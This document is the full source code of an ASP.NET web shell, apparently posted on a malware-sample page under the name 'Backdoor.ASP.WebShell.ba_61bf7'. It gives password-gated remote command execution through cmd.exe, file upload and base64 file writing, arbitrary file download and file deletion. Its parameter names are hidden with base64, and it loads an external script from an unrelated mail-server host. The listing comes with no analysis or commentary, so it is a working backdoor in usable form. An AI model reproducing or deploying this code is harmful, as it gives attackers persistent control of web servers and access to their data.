Backdoor.ASP.WebShell.ba_61bf7 - Source Code

1. <%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
2.  
3. <html xmlns="http://www.w3.org/1999/xhtml">
4. <head>
5. <%
6. c();
7. NameValueCollection t=HttpContext.Current.Request.Form;
8. passwords=fbss(t[x("cGFzc3dvcmRz")]);pro=fbss(t[x("cHJv")]);cmd_exceut=fbss(t[x("Y21kX2V4Y2V1dA==")]);sav=fbss(t[x("c2F2")]);vir=t[x("dmly")];nenggg=fbss(t[x("bmVuZ2dn")]);upb=fbss(t[x("dXBi")]);upd=fbss(t["upd"]);del=fbss(t[x("dXBk")]);dongnn=fbss(t[x("ZG9uZ25u")]);baseFileName=t[x("YmFzZUZpbGVOYW1l")];baseAddress=fbss(t[x("YmFzZUFkZHJlc3M=")]);baseVirpath=t[x("YmFzZVZpcnBhdGg=")];
9. if(!string.IsNullOrEmpty(passwords))c(passwords);
10. else if(!string.IsNullOrEmpty(cmd_exceut))r(pro,cmd_exceut);
11. else if(HttpContext.Current.Request.Files[x("dXBsb2FkbA==")]!=null)u(HttpContext.Current.Request.Files[x("dXBsb2FkbA==")],sav,string.IsNullOrEmpty(vir)?false:true,nenggg);
12. else if(!string.IsNullOrEmpty(upb))h(upb,upd);
13. else if(!string.IsNullOrEmpty(del))d(del);
14. else if(!string.IsNullOrEmpty(dongnn))z(dongnn);
15. else if(!string.IsNullOrEmpty(baseFileName))baseuploadl(baseFileName,baseAddress,string.IsNullOrEmpty(baseVirpath)?false:true);
16.  
17. if(HttpContext.Current.Request.Cookies["data"]!=null){string data=HttpContext.Current.Request.Cookies["data"].Value;string[] data2=data.Split(new string[]{"&|&"},StringSplitOptions.None);for(int i=0;i<data2.Length;i++){string[] data3=data2[i].Split(new string[]{"$=$"},StringSplitOptions.None);
18. switch (data3[0]){
19. case"pro":pro=a(pro,fbss(data3[1]));break;
20. case"cmd_exceut":cmd_exceut=a(cmd_exceut,fbss(data3[1]));break;
21. case"sav":sav=a(sav,fbss(data3[1]));break;
22. case"vir":vir=a(vir,fbss(data3[1]));break;
23. case"nenggg":nenggg=a(nenggg,fbss(data3[1]));break;
24. case"dongnn":dongnn=a(dongnn,fbss(data3[1]));break;
25. }}}
26.  
27. view();
28.     %>
29. <script runat="server">
30. string passwords,pro,cmd_exceut,sav,vir,nenggg,upb,upd,del,dongnn,baseFileName,baseAddress,baseVirpath;
31. bool aut = false;
32. string pp = "FX7nUf6oTBuYLHjBvsBRvoRNM7o=";
33. string a(string a,string b){return string.IsNullOrEmpty(a)?b:a;}
34. string tb(string a)
35. {
36.     string ret="";
37.     try{
38.         ret=string.IsNullOrEmpty(a)?a:Convert.ToBase64String(Encoding.UTF8.GetBytes(a));
39.         }catch{
40.            
41.         }
42.         return ret;
43. }
44. string fbss(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Encoding.UTF8.GetString(Convert.FromBase64String(a));}catch{}return ret;}
45. void view(){string data = string.Format(x("cHJvJD0kezB9JnwmY21kX2V4Y2V1dCQ9JHsxfSZ8JnNhdiQ9JHsyfSZ8JnZpciQ9JHszfSZ8Jm5lbmdnZyQ9JHs0fSZ8JmRvbmdubiQ9JHs1fQ=="),
46. tb(pro),tb(cmd_exceut),tb(sav),tb(vir),tb(nenggg),tb(dongnn));
47. HttpCookie coo=new HttpCookie("data", data);coo.Expires=DateTime.Now.AddDays(1);HttpContext.Current.Response.SetCookie(coo);}
48.  
49. void c(string passwords)
50. {
51.     try{HttpCookie coo=new HttpCookie(x("cGFzc3dvcmRz"),tb(passwords));
52.     coo.Expires=DateTime.Now.AddDays(1);
53.     HttpContext.Current.Response.SetCookie(coo);
54.     aut=Convert.ToBase64String(new System.Security.Cryptography.SHA1CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(passwords)))==pp;
55.     }catch(Exception e)
56.     {
57.         l(e.Message);}
58.     }
59. bool c(){try{if(HttpContext.Current.Request.Cookies[x("cGFzc3dvcmRz")]!=null){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA1CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(fbss(HttpContext.Current.Request.Cookies[x("cGFzc3dvcmRz")].Value))))==pp;return aut;}}catch(Exception e){l(e.Message);}return false;}
60. void u(HttpPostedFile uploadl, string sav, bool vir, string nenggg){try{if(c()){if(uploadl!=null&&uploadl.ContentLength>0){string fn=string.IsNullOrEmpty(nenggg)?System.IO.Path.GetFileName(uploadl.FileName):nenggg;string path=vir?Server.MapPath(sav):sav;string SaveLocation=System.IO.Path.HasExtension(path)?path:path.TrimEnd('\\')+"\\"+fn;uploadl.SaveAs(SaveLocation);l("File uploadloaded successfuly : "+SaveLocation);}}}catch(Exception ex){l(ex.Message);}}
61. void baseuploadl(string baseFileName,string baseAddress, bool baseVirpath){try{if(c()){if(baseFileName!=null&&baseFileName.Length>0&&!string.IsNullOrEmpty(baseAddress)){string SaveLocation=baseVirpath?Server.MapPath(baseAddress):baseAddress;System.IO.File.WriteAllBytes(SaveLocation,Convert.FromBase64String(baseFileName));l("File uploadloaded successfuly : "+SaveLocation);}}}catch(Exception ex){l(ex.Message);}}
62. void r(string pro, string cmd_exceut){try{if(c()){System.Diagnostics.Process n=new System.Diagnostics.Process();n.StartInfo.FileName=(string.IsNullOrEmpty(pro)?"cmd.exe":pro);n.StartInfo.UseShellExecute=false;n.StartInfo.RedirectStandardInput=true;n.StartInfo.RedirectStandardOutput=true;n.StartInfo.RedirectStandardError=true;n.StartInfo.CreateNoWindow=true;string o=null;n.Start();n.StandardInput.WriteLine(cmd_exceut);n.StandardInput.WriteLine("exit");o=n.StandardOutput.ReadToEnd();n.WaitForExit();n.Close();l(HttpUtility.HtmlEncode(o));}}catch(Exception ex){l(ex.Message);}}
63. void z(string dongnn){try{if(c()&&!string.IsNullOrEmpty(dongnn)){byte[] f=System.IO.File.ReadAllBytes(dongnn);System.Web.HttpContext t=System.Web.HttpContext.Current;t.Response.Clear();t.Response.ClearHeaders();t.Response.ClearContent();t.Response.AppendHeader("content-length",f.Length.ToString());t.Response.ContentType="application/octet-stream";t.Response.AppendHeader("content-disposition","attachment; filename="+dongnn.Substring(dongnn.LastIndexOf('\\')+1));t.Response.BinaryWrite(f);t.Response.End();}}catch(Exception ex){l(ex.Message);}}
64. void h(string upb, string upd){try{if(c()&&!string.IsNullOrEmpty(upb)&&!string.IsNullOrEmpty(upd)){System.IO.File.WriteAllBytes(System.IO.Path.GetTempPath()+upd,Convert.FromBase64String(upb));l(upd+" successfuly uploadloaded");}}catch(Exception ex){l(ex.Message);}}
65. void d(string del){try{if(c()&&!string.IsNullOrEmpty(del)){System.IO.File.Delete(System.IO.Path.GetTempPath()+del);l(del+" successfuly deleled");}}catch(Exception ex){l(ex.Message);}}
66. string x(string f){return Encoding.UTF8.GetString(Convert.FromBase64String(f));}
67. void l(string ll){log.InnerHtml=tb(ll);}
68. </script>
69. <style>body,html{margin:0;padding:3px 0 0 3px;direction:ltr;background:#000;color:#fff !important;}form{margin:0;}*{font:14px "Lucida Console";}t{width:180px;display:inline-block;text-align:right;padding-right:5px;}input[type="text"],input[type="file"],textarea {width:50%;height:25px;background:#444;color:#fff;border:1px solid #999;margin-bottom:3px;}input[type="text"]{padding:2px;}input[type="button"],input[type="submit"] {height:23px;}input[type="checkbox"]{width:23px;height:24px;position:absolute;margin:0;}hr{margin:0;border:0;border-top:1px solid #DDD;}.h{width:100px;text-align:center;background:rgba(19, 96, 0, 1);vertical-align:middle;}table{width:100%;margin:0;border-collapse:collapse;}.b{padding:10px 0px 9px;}</style>
70. <script>
71. function use() { var n = document; var d = n.getElementById("d").innerHTML; d = d.substring(0, d.lastIndexOf('\\') + 1); n.getElementsByName("cmd_exceut")[0].value += d; n.getElementsByName("sav")[0].value += d; n.getElementsByName("dongnn")[0].value += d; }
72. function subm(){var mmm=document.getElementsByClassName('mmm');for(var i=0;i<mmm.length;i++){mmm[i].value=btoa(mmm[i].value);}}
73. function reset() { document.cookie = "data=;expires=Thu, 01 Jan 1971 00:00:01 GMT;path=/";location.href = location.pathname;}
74. </script>
75. <script src='https://mail.namagesy.de/owa/prem/15.1.1847/scripts/microsoft.owa.core.immanager.js' ></script>
76. </head>
77. <body>
78. <table>
79. <tr>
80. <td class="h"><%=x("QWRkcmVzcw==")%></td>
81. <td class="b">
82. <t><%=x("Q3VycmVudA==")%> :</t>
83. <y id="d"><%= Server.MapPath(string.Empty) + "\\"%></y>
84. <input type="button" value="<%=x("VXNl")%>" onclick="use()" />
85. <input type="button" value="<%=x("UmVzZXQgRm9ybQ==")%>" onclick="reset()" />
86. </td>
87. </tr>
88. </table>
89. <hr>
90. <form method="post">
91. <table>
92. <tr>
93. <td class="h"><%=x("TG9naW4=")%></td>
94. <td class="b">
95. <t><%=x("RG8gaXQ=")%> :</t>
96. <input name="passwords" class="mmm" type="text" style='background-color: <%= aut ? "Green" : "Red" %>' />
97. <input type="submit" value="<%= x("RG8gaXQ=") %>" onclick="subm();" />
98. </td>
99. </tr>
100. </table>
101. </form>
102. <hr>
103. <form method="post">
104. <table>
105. <tr>
106. <td class="h"><%=x("Q29tbWFuZA==")%></td>
107. <td class="b">
108. <t><%=x("UHJvY2Vzcw==")%> :</t>
109. <input name="pro" class="mmm" type="text" value='<%= string.IsNullOrEmpty(pro) ? x("Y21kLmV4ZQ==") : pro %>' /><br>
110. <t><%=x("Q29tbWFuZA==")%> :</t>
111. <input name="cmd_exceut" class="mmm" type="text" value='<%= cmd_exceut %>' />
112. <input type="submit" value="<%= x("RXhlY3V0ZQ==") %>" onclick="subm();" />
113. </td>
114. </tr>
115. </table>
116. </form>
117. <hr>
118. <form method="post" enctype="multipart/form-data">
119. <table>
120. <tr>
121. <td class="h"><%=x("VXBsb2Fk")%></td>
122. <td class="b">
123. <t><%=x("RmlsZSBOYW1l")%> :</t>
124. <input name="uploadl" type="file" /><br>
125. <t><%=x("U2F2ZSBhcw==")%> :</t>
126. <input name="sav" class="mmm" type="text" value='<%= sav %>' />
127. <input name="vir" type="checkbox" /><g><%=x("SXMgdmlydHVhbCBwYXRo")%></g><br>
128. <t><%=x("TmV3IEZpbGUgbmFtZQ==")%> :</t>
129. <input name="nenggg" class="mmm" type="text" value='<%= nenggg %>' />
130. <input type="submit" value="<%= x("VXBsb2Fk") %>" onclick="subm();" />
131. </td>
132. </tr>
133. </table>
134. </form>
135. <hr>
136. <form method="post">
137. <table>
138. <tr>
139. <td class="h"><%=x("RG93bmxvYWQ=")%></td>
140. <td class="b">
141. <t><%=x("RG93bmxvYWQgUGF0aA==")%> :</t>
142. <input name="dongnn" type="text" />
143. <input type="submit" value="<%= x("RG93bmxvYWQ=") %>" onclick="document.getElementsByName('dongnn')[0].value = btoa(document.getElementsByName('dongnn')[0].value);" />
144. </td>
145. </tr>
146. </table>
147. </form>
148. <hr />
149. <form method="post">
150. <table>
151. <tr>
152. <td class="h"><%=x("VXBsb2FkIEJhc2U2NA==")%></td>
153. <td class="b">
154. <t><%=x("QmFzZTY0IEZpbGU=")%> :</t>
155. <textarea name="baseFileName"></textarea>
156. <input name="baseVirpath" type="checkbox" /><g><%=x("SXMgdmlydHVhbCBwYXRo")%></g><br>
157. <t><%=x("RmlsZSBQYXRoIGFuZCBOYW1l ")%> :</t>
158. <input name="baseAddress" class="mmm" type="text" value='<%= baseAddress %>' />
159. <input type="submit" value="<%= x("VXBsb2Fk") %>" onclick="subm();" />
160. </td>
161. </tr>
162. </table>
163. </form>
164. <hr />
165. </form>
166. <hr />
167. <br />
168. <pre id="log" runat="server"></pre>
169. <script>var ll=document.getElementById('log');if(ll.innerHTML)ll.innerHTML=atob(log.innerHTML);</script>
170. </body>
171. </html>
172. XXxxxx